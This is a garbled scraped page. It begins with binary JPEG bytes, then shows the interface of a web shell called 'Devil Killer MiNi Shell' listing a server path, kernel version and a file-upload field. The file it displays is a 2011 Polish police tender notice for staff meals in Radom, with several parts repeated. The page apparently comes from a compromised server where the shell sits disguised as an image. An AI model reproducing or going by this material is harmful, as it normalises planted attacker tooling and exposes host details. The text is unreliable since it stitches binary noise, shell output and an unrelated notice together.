JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111104/288341-N-2011.html

<p class="kh_header"><b>Radom: Usługi restauracyjne: przygotowywanie i wydawanie posiłków profilaktycznych dla pracowników Policji i posiłków dla policjantów KWP zs. w Radomiu. Nr sprawy 192/2011</b><br>
<b>Numer ogłoszenia: 288341 - 2011; data zamieszczenia: 04.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji z siedzibą w Radomiu , ul. 11 Listopada 37/59, 26-600 Radom, woj. mazowieckie, tel. 048 3453103, faks 048 3452002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.mazowiecka.policja.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi restauracyjne: przygotowywanie i wydawanie posiłków profilaktycznych dla pracowników Policji i posiłków dla policjantów KWP zs. w Radomiu. Nr sprawy 192/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przygotowywanie i wydawanie posiłków profilaktycznych dla pracowników Policji i posiłków dla policjantów KWP zs. w Radomiu.

		ZADANIE NR 1- Posiłki dla policjantów KWP zs. w Radomiu będą wydawane indywidualnie 	w dni 	powszednie w godzinach od 8°° do 15°° . Posiłki będą przygotowywane na podstawie 	ustalonych receptur w postaci gorącego    posiłku (zupa + drugie danie)  wg 125% normy DU 	ustalonej przez Dyrektora Departamentu Bezpieczeństwa Publicznego MSWIA i Dyrektora 	Departamentu Budżetu MSWIA , która wynosi 8.30 zł netto na jednego żywionego. Wykonawca  będzie  realizował usługi na podstawie bonów żywnościowych GZ 40 wystawionych  przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon. Bon żywnościowy musi być zrealizowany w ciągu 2 dni od 	dnia jego wystawienia. Nie dopuszcza się dokonania zmiany posiłku na inne artykuły 	spożywcze.
		ZADANIA OD NR 2 DO NR 16 POSIŁKI PROFILAKTYCZNE I GORĄCE NAPOJE DLA 	PRACOWNIKÓW POLICJI:
Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja tego warunku na podstawie oświadczenia zgodnego w treści z załącznikiem nr1 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja tego warunku na podstawie oświadczenia zgodnego w treści z załącznikiem nr1 do siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja tego warunku na podstawie oświadczenia zgodnego w treści z załącznikiem nr1 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja tego warunku na podstawie oświadczenia zgodnego w treści z załącznikiem nr1 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>weryfikacja tego warunku na podstawie oświadczenia zgodnego w treści z załącznikiem nr1 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dysponowania niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W przypadku udzielenia pełnomocnictwa -  oryginał pełnomocnictwa lub kopia poświadczona przez notariusza.

formularz ofertowy ( wzór stanowi załącznik Nr 5 dla zadania nr 1,  załącznik Nr 5A  dla zadań od nr 2 do nr 16)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mazowiecka.policja.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji zs. w Radomiu
Ul. 11-go Listopada 37/59
26-600 Radom
Sekcja Zamówień Publicznych
faks 48 345 20 02.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 10:00, miejsce: Komenda Wojewódzka Policji zs. w Radomiu
ul. 11-go Listopada 37/59
26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu pokój 801.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1- Posiłki dla policjantów KWP zs. w Radomiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Posiłki dla policjantów KWP zs. w Radomiu będą wydawane indywidualnie 	w dni 	powszednie w godzinach od 8°° do 15°° . Posiłki będą przygotowywane na podstawie 	ustalonych receptur w postaci gorącego    posiłku (zupa + drugie danie)  wg 125% normy DU 	ustalonej przez Dyrektora Departamentu Bezpieczeństwa Publicznego MSWIA i Dyrektora 	Departamentu Budżetu MSWIA , która wynosi 8.30 zł netto na jednego żywionego. Wykonawca  będzie  realizował usługi na podstawie bonów żywnościowych GZ 40 wystawionych  przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon. Bon żywnościowy musi być zrealizowany w ciągu 2 dni od 	dnia jego wystawienia. Nie dopuszcza się dokonania zmiany posiłku na inne artykuły 	spożywcze.
UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - KPP Białobrzegi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 - KPP Kozienice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4- KPP -Lipsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5 - KPP Gostynin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 6 - KPP Zwoleń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR 7 - KPP - Szydłowiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE NR 8 - KMP Płock.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE NR 9 - KMP Siedlce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE NR 10 - KPP Łosice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi restauracyjne świadczone będą dla pracowników Policji KWP/KMP/KPP  zgodnie 
z ofertą częściową w dni powszednie w godzinach od 8.00 do 17.00 oraz soboty 9.00 do 16.00.
Posiłek profilaktyczny to zupa z wkładką + gorący napój i musi posiadać wartość kaloryczną około 1500 kcal.
      Wykonawca wykonywać będzie usługi na podstawie bonów żywnościowych GZ 40 wystawionych     przez Zamawiającego na konkretny dzień, opatrzonych pieczęcią osoby wydającej bon.
Nie dopuszcza się dokonania zmiany posiłku na inne artykuły spożywcze.

UWAGA! Siedziba wykonawcy świadczącego usługi restauracyjne dla poszczególnych jednostek policji (dla zadań od nr 1do nr 16) musi znajdować się w obrębie administracyjnym miasta, 
w którym znajduje się siedziba jednostki policji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
